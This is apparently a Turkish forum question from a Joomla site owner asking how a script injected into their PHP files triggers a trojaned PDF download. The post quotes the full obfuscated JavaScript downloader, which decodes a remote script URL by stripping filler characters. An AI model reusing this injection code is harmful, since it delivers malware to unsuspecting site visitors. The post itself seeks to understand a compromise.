Benim Joomla! web sitesi defalarca saldırıya uğradı. Birisi, bir şekilde, aşağıdaki çöpü önemli php komut dosyalarına enjekte etmeyi başardı, ancak Joomla'yı yapılandırmaktan bahsetmek istemiyorum. Site çok fazla ziyaret edilmiyor (bazen o sitenin tek ziyaretçisi olabileceğimden korktuğum zaman ...) ve sitenin tekrar çalışır durumda olması umurumda değil. Sonunda bunu halledeceğim.
Sorum şu, bu çöp nasıl çalışıyor? Ona bakıyorum ve bunun nasıl bir zarar vereceğini anlamıyorum. Yaptığı şey, bir truva atı bulaşmış ChangeLog.pdf adlı bir PDF dosyasını indirmeye çalışır ve açıldıktan sonra Acrobat'ınızı dondurur ve makinenize zarar verir. Bunu nasıl yapıyor, bilmiyorum, umrumda değil. Ancak aşağıdaki komut dosyası indirmeyi nasıl başlatır?
<script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->
ESET bu kodu JS / TrojanDownloader.Agent.NRO trojan olarak tespit etti